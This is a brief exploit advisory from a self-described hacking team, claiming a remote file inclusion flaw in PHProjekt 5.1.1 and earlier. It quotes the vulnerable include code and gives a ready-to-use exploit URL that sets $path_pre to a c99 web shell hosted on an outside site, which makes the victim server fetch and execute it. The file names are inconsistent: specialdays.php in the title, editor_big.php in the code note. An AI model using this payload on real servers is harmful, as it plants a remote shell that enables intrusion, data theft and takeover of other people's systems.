PHProjekt 5.1.1 and prior suffers from a remote file inclusion vulnerability in specialdays.php.
10477f4c1d9689f772bd034f0498416236fa9e56b53185aae290deddb3143a63
===============================================
# Found By Sp1deR_NeT ..
# E-mail :- Sp1deR_Net@Hotmail.Com
# Site's :- WwW.Sp1deR-N3T.Com +++ WwW.Pal-HackinG.Com
# We Are :- PalEstine HackerS TeAm ..(Sp1deR_Net , MohajaLi , HACKERS PAL )
*************************************
Script :- PHP rojekt5.1.1
-----
Code Vuln :-
$include_path = $path_pre.'lib/lib.inc.php';
include_once($include_path)
In File :- editor_big.php
-----
Exploit : lib/specialdays.php?$path_pre=www.soqor.net/tools/c99.txt?
Example :- www.sitename.com/[path]/lib/specialdays.php?
$path_pre=www.soqor.net/tools/c99.txt?
-----
Sp1deR_Net@Hotmail.Com
Sp1deR_NeT (((((((()))))))) ^__^
===============================================
_________________________________________________________________
Be the first to hear what's new at MSN - sign up to our free newsletters!
http://www.msn.co.uk/newsletters